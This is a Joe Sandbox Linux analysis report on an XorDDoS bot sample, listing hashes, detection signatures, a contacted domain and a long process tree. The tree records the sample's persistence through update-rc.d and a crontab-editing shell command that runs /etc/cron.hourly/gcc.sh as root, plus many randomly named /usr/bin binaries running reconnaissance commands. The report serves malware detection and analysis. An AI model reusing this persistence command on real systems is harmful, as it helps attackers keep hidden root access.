Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
UDMp3dZ7nc.elf

Overview

General Information

Sample name:UDMp3dZ7nc.elf
renamed because original name is a hash value
Original sample name:004fec424e843ff98113f97bde2d6717f99975a2504ab3efa42c12474a62d828.elf
Analysis ID:1583792
MD5:22cd21f5cfc3ea409f3a05585d903949
SHA1:d48c82b3ce4460930518a924a51bab5c496b38b0
SHA256:004fec424e843ff98113f97bde2d6717f99975a2504ab3efa42c12474a62d828
Tags:elfuser-malrpt
Infos:

Detection

XorDDoS
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XorDDoS Bot
Drops files in suspicious directories
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample deletes itself
Sample tries to persist itself using System V runlevels
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Drops files with innocent-looking names
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
PID-file does not contain an ASCII number
Reads CPU information from /proc indicative of miner or evasive malware
Reads system information from the proc file system
Sample has stripped symbol table
Sleeps for long times indicative of sandbox evasion
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes shell script file to disk with an unusual file extension
Writes shell script files to disk
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1583792
Start date and time:2025-01-03 15:27:05 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 14s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:UDMp3dZ7nc.elf
renamed because original name is a hash value
Original Sample Name:004fec424e843ff98113f97bde2d6717f99975a2504ab3efa42c12474a62d828.elf
Detection:MAL
Classification:mal100.troj.evad.linELF@0/21@5/0
  • VT rate limit hit for: ppp.gggatat456.com
Command:/tmp/UDMp3dZ7nc.elf
PID:6260
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • UDMp3dZ7nc.elf (PID: 6260, Parent: 6186, MD5: 22cd21f5cfc3ea409f3a05585d903949) Arguments: /tmp/UDMp3dZ7nc.elf
    • UDMp3dZ7nc.elf New Fork (PID: 6261, Parent: 6260)
      • UDMp3dZ7nc.elf New Fork (PID: 6264, Parent: 6261)
        • update-rc.d (PID: 6265, Parent: 1860, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d UDMp3dZ7nc.elf defaults
          • systemctl (PID: 6271, Parent: 6265, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
      • sh (PID: 6266, Parent: 6261, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
        • sh New Fork (PID: 6267, Parent: 6266)
        • sed (PID: 6267, Parent: 6266, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
      • UDMp3dZ7nc.elf New Fork (PID: 6293, Parent: 6261)
        • oigyzaiygp (PID: 6294, Parent: 6293, MD5: 62c3a5bb687fbbf7c6618bea4daadf29) Arguments: /usr/bin/oigyzaiygp ifconfig 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6296, Parent: 6261)
        • oigyzaiygp (PID: 6297, Parent: 6296, MD5: 62c3a5bb687fbbf7c6618bea4daadf29) Arguments: /usr/bin/oigyzaiygp pwd 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6298, Parent: 6261)
        • oigyzaiygp (PID: 6300, Parent: 6298, MD5: 62c3a5bb687fbbf7c6618bea4daadf29) Arguments: /usr/bin/oigyzaiygp "cat resolv.conf" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6301, Parent: 6261)
        • oigyzaiygp (PID: 6302, Parent: 6301, MD5: 62c3a5bb687fbbf7c6618bea4daadf29) Arguments: /usr/bin/oigyzaiygp gnome-terminal 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6303, Parent: 6261)
        • oigyzaiygp (PID: 6305, Parent: 6303, MD5: 62c3a5bb687fbbf7c6618bea4daadf29) Arguments: /usr/bin/oigyzaiygp "netstat -an" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6311, Parent: 6261)
        • sosfbbrzmx (PID: 6312, Parent: 6311, MD5: 01fd1f9249b1844a8c8d2d32cedc38b7) Arguments: /usr/bin/sosfbbrzmx ifconfig 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6314, Parent: 6261)
        • sosfbbrzmx (PID: 6315, Parent: 6314, MD5: 01fd1f9249b1844a8c8d2d32cedc38b7) Arguments: /usr/bin/sosfbbrzmx sh 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6316, Parent: 6261)
        • sosfbbrzmx (PID: 6317, Parent: 6316, MD5: 01fd1f9249b1844a8c8d2d32cedc38b7) Arguments: /usr/bin/sosfbbrzmx whoami 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6319, Parent: 6261)
        • sosfbbrzmx (PID: 6320, Parent: 6319, MD5: 01fd1f9249b1844a8c8d2d32cedc38b7) Arguments: /usr/bin/sosfbbrzmx ls 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6322, Parent: 6261)
        • sosfbbrzmx (PID: 6323, Parent: 6322, MD5: 01fd1f9249b1844a8c8d2d32cedc38b7) Arguments: /usr/bin/sosfbbrzmx top 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6328, Parent: 6261)
        • gphlkawhxw (PID: 6329, Parent: 6328, MD5: 32baef41bef86e657cecb26ba601c8fd) Arguments: /usr/bin/gphlkawhxw "ifconfig eth0" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6331, Parent: 6261)
        • gphlkawhxw (PID: 6332, Parent: 6331, MD5: 32baef41bef86e657cecb26ba601c8fd) Arguments: /usr/bin/gphlkawhxw uptime 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6333, Parent: 6261)
        • gphlkawhxw (PID: 6334, Parent: 6333, MD5: 32baef41bef86e657cecb26ba601c8fd) Arguments: /usr/bin/gphlkawhxw "route -n" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6335, Parent: 6261)
        • gphlkawhxw (PID: 6336, Parent: 6335, MD5: 32baef41bef86e657cecb26ba601c8fd) Arguments: /usr/bin/gphlkawhxw ls 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6338, Parent: 6261)
        • gphlkawhxw (PID: 6339, Parent: 6338, MD5: 32baef41bef86e657cecb26ba601c8fd) Arguments: /usr/bin/gphlkawhxw who 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6364, Parent: 6261)
        • vnihfmehfy (PID: 6365, Parent: 6364, MD5: f0f21df0836e951d36bb440812753052) Arguments: /usr/bin/vnihfmehfy "cat resolv.conf" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6367, Parent: 6261)
        • vnihfmehfy (PID: 6368, Parent: 6367, MD5: f0f21df0836e951d36bb440812753052) Arguments: /usr/bin/vnihfmehfy id 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6369, Parent: 6261)
        • vnihfmehfy (PID: 6370, Parent: 6369, MD5: f0f21df0836e951d36bb440812753052) Arguments: /usr/bin/vnihfmehfy sh 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6372, Parent: 6261)
        • vnihfmehfy (PID: 6373, Parent: 6372, MD5: f0f21df0836e951d36bb440812753052) Arguments: /usr/bin/vnihfmehfy uptime 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6375, Parent: 6261)
        • vnihfmehfy (PID: 6376, Parent: 6375, MD5: f0f21df0836e951d36bb440812753052) Arguments: /usr/bin/vnihfmehfy top 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6381, Parent: 6261)
        • eqoogeqyds (PID: 6382, Parent: 6381, MD5: 4bb785727d658c24555afb2552203824) Arguments: /usr/bin/eqoogeqyds "netstat -an" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6386, Parent: 6261)
        • eqoogeqyds (PID: 6387, Parent: 6386, MD5: 4bb785727d658c24555afb2552203824) Arguments: /usr/bin/eqoogeqyds "echo \"find\"" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6388, Parent: 6261)
        • eqoogeqyds (PID: 6390, Parent: 6388, MD5: 4bb785727d658c24555afb2552203824) Arguments: /usr/bin/eqoogeqyds whoami 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6391, Parent: 6261)
        • eqoogeqyds (PID: 6392, Parent: 6391, MD5: 4bb785727d658c24555afb2552203824) Arguments: /usr/bin/eqoogeqyds "sleep 1" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6394, Parent: 6261)
        • eqoogeqyds (PID: 6395, Parent: 6394, MD5: 4bb785727d658c24555afb2552203824) Arguments: /usr/bin/eqoogeqyds "route -n" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6400, Parent: 6261)
        • otlzwyqefc (PID: 6401, Parent: 6400, MD5: 3cab282fbf544a8c5da93e8a6e8649d0) Arguments: /usr/bin/otlzwyqefc whoami 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6403, Parent: 6261)
        • otlzwyqefc (PID: 6404, Parent: 6403, MD5: 3cab282fbf544a8c5da93e8a6e8649d0) Arguments: /usr/bin/otlzwyqefc ls 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6405, Parent: 6261)
        • otlzwyqefc (PID: 6406, Parent: 6405, MD5: 3cab282fbf544a8c5da93e8a6e8649d0) Arguments: /usr/bin/otlzwyqefc uptime 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6408, Parent: 6261)
        • otlzwyqefc (PID: 6409, Parent: 6408, MD5: 3cab282fbf544a8c5da93e8a6e8649d0) Arguments: /usr/bin/otlzwyqefc "netstat -antop" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6410, Parent: 6261)
        • otlzwyqefc (PID: 6411, Parent: 6410, MD5: 3cab282fbf544a8c5da93e8a6e8649d0) Arguments: /usr/bin/otlzwyqefc sh 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6417, Parent: 6261)
        • dthtwwmqvu (PID: 6418, Parent: 6417, MD5: f0744c231fd483b8e536adaae22fed9c) Arguments: /usr/bin/dthtwwmqvu ls 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6420, Parent: 6261)
        • dthtwwmqvu (PID: 6421, Parent: 6420, MD5: f0744c231fd483b8e536adaae22fed9c) Arguments: /usr/bin/dthtwwmqvu whoami 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6422, Parent: 6261)
        • dthtwwmqvu (PID: 6423, Parent: 6422, MD5: f0744c231fd483b8e536adaae22fed9c) Arguments: /usr/bin/dthtwwmqvu ifconfig 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6425, Parent: 6261)
        • dthtwwmqvu (PID: 6426, Parent: 6425, MD5: f0744c231fd483b8e536adaae22fed9c) Arguments: /usr/bin/dthtwwmqvu "netstat -an" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6428, Parent: 6261)
        • dthtwwmqvu (PID: 6429, Parent: 6428, MD5: f0744c231fd483b8e536adaae22fed9c) Arguments: /usr/bin/dthtwwmqvu "netstat -an" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6435, Parent: 6261)
        • jeyjdycnpv (PID: 6436, Parent: 6435, MD5: 874925f3383cf4d89cfb331d6357dcc4) Arguments: /usr/bin/jeyjdycnpv "cat resolv.conf" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6438, Parent: 6261)
        • jeyjdycnpv (PID: 6439, Parent: 6438, MD5: 874925f3383cf4d89cfb331d6357dcc4) Arguments: /usr/bin/jeyjdycnpv "cd /etc" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6440, Parent: 6261)
        • jeyjdycnpv (PID: 6441, Parent: 6440, MD5: 874925f3383cf4d89cfb331d6357dcc4) Arguments: /usr/bin/jeyjdycnpv ifconfig 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6443, Parent: 6261)
        • jeyjdycnpv (PID: 6444, Parent: 6443, MD5: 874925f3383cf4d89cfb331d6357dcc4) Arguments: /usr/bin/jeyjdycnpv "ps -ef" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6446, Parent: 6261)
        • jeyjdycnpv (PID: 6447, Parent: 6446, MD5: 874925f3383cf4d89cfb331d6357dcc4) Arguments: /usr/bin/jeyjdycnpv ls 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6452, Parent: 6261)
        • wutujskjnm (PID: 6453, Parent: 6452, MD5: 890231c9558b66f036f3c8f7cebb5d72) Arguments: /usr/bin/wutujskjnm "grep \"A\"" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6455, Parent: 6261)
        • wutujskjnm (PID: 6456, Parent: 6455, MD5: 890231c9558b66f036f3c8f7cebb5d72) Arguments: /usr/bin/wutujskjnm "echo \"find\"" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6457, Parent: 6261)
        • wutujskjnm (PID: 6458, Parent: 6457, MD5: 890231c9558b66f036f3c8f7cebb5d72) Arguments: /usr/bin/wutujskjnm su 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6460, Parent: 6261)
        • wutujskjnm (PID: 6461, Parent: 6460, MD5: 890231c9558b66f036f3c8f7cebb5d72) Arguments: /usr/bin/wutujskjnm su 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6463, Parent: 6261)
        • wutujskjnm (PID: 6464, Parent: 6463, MD5: 890231c9558b66f036f3c8f7cebb5d72) Arguments: /usr/bin/wutujskjnm top 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6471, Parent: 6261)
        • qxzsiorokf (PID: 6472, Parent: 6471, MD5: d660d3565aa30310004c75f37e3fe19f) Arguments: /usr/bin/qxzsiorokf who 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6474, Parent: 6261)
        • qxzsiorokf (PID: 6475, Parent: 6474, MD5: d660d3565aa30310004c75f37e3fe19f) Arguments: /usr/bin/qxzsiorokf sh 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6476, Parent: 6261)
        • qxzsiorokf (PID: 6477, Parent: 6476, MD5: d660d3565aa30310004c75f37e3fe19f) Arguments: /usr/bin/qxzsiorokf "cd /etc" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6479, Parent: 6261)
        • qxzsiorokf (PID: 6481, Parent: 6479, MD5: d660d3565aa30310004c75f37e3fe19f) Arguments: /usr/bin/qxzsiorokf "ps -ef" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6482, Parent: 6261)
        • qxzsiorokf (PID: 6483, Parent: 6482, MD5: d660d3565aa30310004c75f37e3fe19f) Arguments: /usr/bin/qxzsiorokf "grep \"A\"" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6488, Parent: 6261)
        • uzqdvpyngy (PID: 6489, Parent: 6488, MD5: 53241e7c3d48f7919dc80796d016a705) Arguments: /usr/bin/uzqdvpyngy "netstat -antop" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6491, Parent: 6261)
        • uzqdvpyngy (PID: 6492, Parent: 6491, MD5: 53241e7c3d48f7919dc80796d016a705) Arguments: /usr/bin/uzqdvpyngy pwd 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6493, Parent: 6261)
        • uzqdvpyngy (PID: 6494, Parent: 6493, MD5: 53241e7c3d48f7919dc80796d016a705) Arguments: /usr/bin/uzqdvpyngy gnome-terminal 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6496, Parent: 6261)
        • uzqdvpyngy (PID: 6497, Parent: 6496, MD5: 53241e7c3d48f7919dc80796d016a705) Arguments: /usr/bin/uzqdvpyngy "ps -ef" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6498, Parent: 6261)
        • uzqdvpyngy (PID: 6500, Parent: 6498, MD5: 53241e7c3d48f7919dc80796d016a705) Arguments: /usr/bin/uzqdvpyngy bash 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6505, Parent: 6261)
        • bgoiqqymph (PID: 6506, Parent: 6505, MD5: 36dfbcd1cb8fb95125af217877d82a82) Arguments: /usr/bin/bgoiqqymph "ls -la" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6508, Parent: 6261)
        • bgoiqqymph (PID: 6509, Parent: 6508, MD5: 36dfbcd1cb8fb95125af217877d82a82) Arguments: /usr/bin/bgoiqqymph sh 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6510, Parent: 6261)
        • bgoiqqymph (PID: 6512, Parent: 6510, MD5: 36dfbcd1cb8fb95125af217877d82a82) Arguments: /usr/bin/bgoiqqymph "sleep 1" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6513, Parent: 6261)
        • bgoiqqymph (PID: 6514, Parent: 6513, MD5: 36dfbcd1cb8fb95125af217877d82a82) Arguments: /usr/bin/bgoiqqymph ifconfig 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6516, Parent: 6261)
        • bgoiqqymph (PID: 6517, Parent: 6516, MD5: 36dfbcd1cb8fb95125af217877d82a82) Arguments: /usr/bin/bgoiqqymph who 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6525, Parent: 6261)
        • uhjkqkcgma (PID: 6526, Parent: 6525, MD5: 9d2be3b2e820cf7206aad0dc28d827dd) Arguments: /usr/bin/uhjkqkcgma pwd 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6528, Parent: 6261)
        • uhjkqkcgma (PID: 6529, Parent: 6528, MD5: 9d2be3b2e820cf7206aad0dc28d827dd) Arguments: /usr/bin/uhjkqkcgma "cd /etc" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6530, Parent: 6261)
        • uhjkqkcgma (PID: 6531, Parent: 6530, MD5: 9d2be3b2e820cf7206aad0dc28d827dd) Arguments: /usr/bin/uhjkqkcgma uptime 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6533, Parent: 6261)
        • uhjkqkcgma (PID: 6534, Parent: 6533, MD5: 9d2be3b2e820cf7206aad0dc28d827dd) Arguments: /usr/bin/uhjkqkcgma gnome-terminal 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6536, Parent: 6261)
        • uhjkqkcgma (PID: 6537, Parent: 6536, MD5: 9d2be3b2e820cf7206aad0dc28d827dd) Arguments: /usr/bin/uhjkqkcgma "cat resolv.conf" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6542, Parent: 6261)
        • ksagqhmoao (PID: 6543, Parent: 6542, MD5: c2be7f6f3d8a2dd22bb027877353c35f) Arguments: /usr/bin/ksagqhmoao pwd 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6545, Parent: 6261)
        • ksagqhmoao (PID: 6546, Parent: 6545, MD5: c2be7f6f3d8a2dd22bb027877353c35f) Arguments: /usr/bin/ksagqhmoao "ls -la" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6547, Parent: 6261)
        • ksagqhmoao (PID: 6548, Parent: 6547, MD5: c2be7f6f3d8a2dd22bb027877353c35f) Arguments: /usr/bin/ksagqhmoao "sleep 1" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6549, Parent: 6261)
        • ksagqhmoao (PID: 6551, Parent: 6549, MD5: c2be7f6f3d8a2dd22bb027877353c35f) Arguments: /usr/bin/ksagqhmoao "ls -la" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6552, Parent: 6261)
        • ksagqhmoao (PID: 6553, Parent: 6552, MD5: c2be7f6f3d8a2dd22bb027877353c35f) Arguments: /usr/bin/ksagqhmoao "ls -la" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6559, Parent: 6261)
        • snluqxjnyb (PID: 6560, Parent: 6559, MD5: b711ff9d714c1e77683e9a8cda370270) Arguments: /usr/bin/snluqxjnyb "netstat -an" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6562, Parent: 6261)
        • snluqxjnyb (PID: 6563, Parent: 6562, MD5: b711ff9d714c1e77683e9a8cda370270) Arguments: /usr/bin/snluqxjnyb "sleep 1" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6564, Parent: 6261)
        • snluqxjnyb (PID: 6565, Parent: 6564, MD5: b711ff9d714c1e77683e9a8cda370270) Arguments: /usr/bin/snluqxjnyb "cd /etc" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6567, Parent: 6261)
        • snluqxjnyb (PID: 6568, Parent: 6567, MD5: b711ff9d714c1e77683e9a8cda370270) Arguments: /usr/bin/snluqxjnyb "grep \"A\"" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6570, Parent: 6261)
        • snluqxjnyb (PID: 6571, Parent: 6570, MD5: b711ff9d714c1e77683e9a8cda370270) Arguments: /usr/bin/snluqxjnyb top 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6576, Parent: 6261)
        • rfdcbxuezd (PID: 6577, Parent: 6576, MD5: bcf7ec16fced4436fe9502643e9c86a8) Arguments: /usr/bin/rfdcbxuezd "ps -ef" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6579, Parent: 6261)
        • rfdcbxuezd (PID: 6580, Parent: 6579, MD5: bcf7ec16fced4436fe9502643e9c86a8) Arguments: /usr/bin/rfdcbxuezd "cat resolv.conf" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6581, Parent: 6261)
        • rfdcbxuezd (PID: 6583, Parent: 6581, MD5: bcf7ec16fced4436fe9502643e9c86a8) Arguments: /usr/bin/rfdcbxuezd "cd /etc" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6584, Parent: 6261)
        • rfdcbxuezd (PID: 6585, Parent: 6584, MD5: bcf7ec16fced4436fe9502643e9c86a8) Arguments: /usr/bin/rfdcbxuezd "cd /etc" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6587, Parent: 6261)
        • rfdcbxuezd (PID: 6588, Parent: 6587, MD5: bcf7ec16fced4436fe9502643e9c86a8) Arguments: /usr/bin/rfdcbxuezd id 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6593, Parent: 6261)
        • nqjbkvhncc (PID: 6594, Parent: 6593, MD5: 19502630540ed5c815ecc4fe6cd2d733) Arguments: /usr/bin/nqjbkvhncc "cat resolv.conf" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6596, Parent: 6261)
        • nqjbkvhncc (PID: 6597, Parent: 6596, MD5: 19502630540ed5c815ecc4fe6cd2d733) Arguments: /usr/bin/nqjbkvhncc "sleep 1" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6598, Parent: 6261)
        • nqjbkvhncc (PID: 6599, Parent: 1860, MD5: 19502630540ed5c815ecc4fe6cd2d733) Arguments: /usr/bin/nqjbkvhncc gnome-terminal 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6601, Parent: 6261)
        • nqjbkvhncc (PID: 6602, Parent: 1860, MD5: 19502630540ed5c815ecc4fe6cd2d733) Arguments: /usr/bin/nqjbkvhncc gnome-terminal 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6603, Parent: 6261)
        • nqjbkvhncc (PID: 6604, Parent: 1860, MD5: 19502630540ed5c815ecc4fe6cd2d733) Arguments: /usr/bin/nqjbkvhncc ifconfig 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6611, Parent: 6261)
        • xzmsvqaqiz (PID: 6612, Parent: 6611, MD5: 9f80890f560ed6066115f1895d821440) Arguments: /usr/bin/xzmsvqaqiz "ls -la" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6613, Parent: 6261)
        • xzmsvqaqiz (PID: 6614, Parent: 1860, MD5: 9f80890f560ed6066115f1895d821440) Arguments: /usr/bin/xzmsvqaqiz "sleep 1" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6615, Parent: 6261)
        • xzmsvqaqiz (PID: 6616, Parent: 1860, MD5: 9f80890f560ed6066115f1895d821440) Arguments: /usr/bin/xzmsvqaqiz "ps -ef" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6618, Parent: 6261)
        • xzmsvqaqiz (PID: 6619, Parent: 1860, MD5: 9f80890f560ed6066115f1895d821440) Arguments: /usr/bin/xzmsvqaqiz "grep \"A\"" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6620, Parent: 6261)
        • xzmsvqaqiz (PID: 6622, Parent: 1860, MD5: 9f80890f560ed6066115f1895d821440) Arguments: /usr/bin/xzmsvqaqiz ifconfig 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6629, Parent: 6261)
        • bbdupdfrbl (PID: 6630, Parent: 6629, MD5: ce8ed5c0103d476aae51c2e02825f9cd) Arguments: /usr/bin/bbdupdfrbl "ifconfig eth0" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6631, Parent: 6261)
        • bbdupdfrbl (PID: 6632, Parent: 1860, MD5: ce8ed5c0103d476aae51c2e02825f9cd) Arguments: /usr/bin/bbdupdfrbl who 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6633, Parent: 6261)
        • bbdupdfrbl (PID: 6634, Parent: 6633, MD5: ce8ed5c0103d476aae51c2e02825f9cd) Arguments: /usr/bin/bbdupdfrbl "echo \"find\"" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6636, Parent: 6261)
        • bbdupdfrbl (PID: 6637, Parent: 1860, MD5: ce8ed5c0103d476aae51c2e02825f9cd) Arguments: /usr/bin/bbdupdfrbl whoami 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6639, Parent: 6261)
        • bbdupdfrbl (PID: 6640, Parent: 1860, MD5: ce8ed5c0103d476aae51c2e02825f9cd) Arguments: /usr/bin/bbdupdfrbl "route -n" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6646, Parent: 6261)
        • lqmgtequuz (PID: 6647, Parent: 1860, MD5: 89dc58010dc1112c748954232f0e45bc) Arguments: /usr/bin/lqmgtequuz su 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6648, Parent: 6261)
        • lqmgtequuz (PID: 6650, Parent: 1860, MD5: 89dc58010dc1112c748954232f0e45bc) Arguments: /usr/bin/lqmgtequuz "ls -la" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6651, Parent: 6261)
        • lqmgtequuz (PID: 6652, Parent: 1860, MD5: 89dc58010dc1112c748954232f0e45bc) Arguments: /usr/bin/lqmgtequuz "grep \"A\"" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6654, Parent: 6261)
        • lqmgtequuz (PID: 6655, Parent: 1860, MD5: 89dc58010dc1112c748954232f0e45bc) Arguments: /usr/bin/lqmgtequuz "ps -ef" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6656, Parent: 6261)
        • lqmgtequuz (PID: 6657, Parent: 1860, MD5: 89dc58010dc1112c748954232f0e45bc) Arguments: /usr/bin/lqmgtequuz "echo \"find\"" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6665, Parent: 6261)
        • vzezokfask (PID: 6666, Parent: 6665, MD5: 41de595dc0b051eb3e53023ef6d8b788) Arguments: /usr/bin/vzezokfask "echo \"find\"" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6667, Parent: 6261)
        • vzezokfask (PID: 6668, Parent: 1860, MD5: 41de595dc0b051eb3e53023ef6d8b788) Arguments: /usr/bin/vzezokfask sh 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6669, Parent: 6261)
        • vzezokfask (PID: 6671, Parent: 1860, MD5: 41de595dc0b051eb3e53023ef6d8b788) Arguments: /usr/bin/vzezokfask "ifconfig eth0" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6672, Parent: 6261)
        • vzezokfask (PID: 6673, Parent: 1860, MD5: 41de595dc0b051eb3e53023ef6d8b788) Arguments: /usr/bin/vzezokfask ls 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6674, Parent: 6261)
        • vzezokfask (PID: 6676, Parent: 1860, MD5: 41de595dc0b051eb3e53023ef6d8b788) Arguments: /usr/bin/vzezokfask "ps -ef" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6682, Parent: 6261)
        • skjzlhozvl (PID: 6683, Parent: 6682, MD5: 4d269bc77499545c56e853c6f0db0bb4) Arguments: /usr/bin/skjzlhozvl "route -n" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6684, Parent: 6261)
        • skjzlhozvl (PID: 6685, Parent: 1860, MD5: 4d269bc77499545c56e853c6f0db0bb4) Arguments: /usr/bin/skjzlhozvl who 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6686, Parent: 6261)
        • skjzlhozvl (PID: 6687, Parent: 1860, MD5: 4d269bc77499545c56e853c6f0db0bb4) Arguments: /usr/bin/skjzlhozvl "route -n" 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6689, Parent: 6261)
        • skjzlhozvl (PID: 6690, Parent: 1860, MD5: 4d269bc77499545c56e853c6f0db0bb4) Arguments: /usr/bin/skjzlhozvl uptime 6261
      • UDMp3dZ7nc.elf New Fork (PID: 6691, Parent: 6261)
        • skjzlhozvl (PID: 6692, Parent: 1860, MD5: 4d269bc77499545c56e853c6f0db0bb4) Arguments: /usr/bin/skjzlhozvl uptime 6261
  • systemd New Fork (PID: 6273, Parent: 6272)
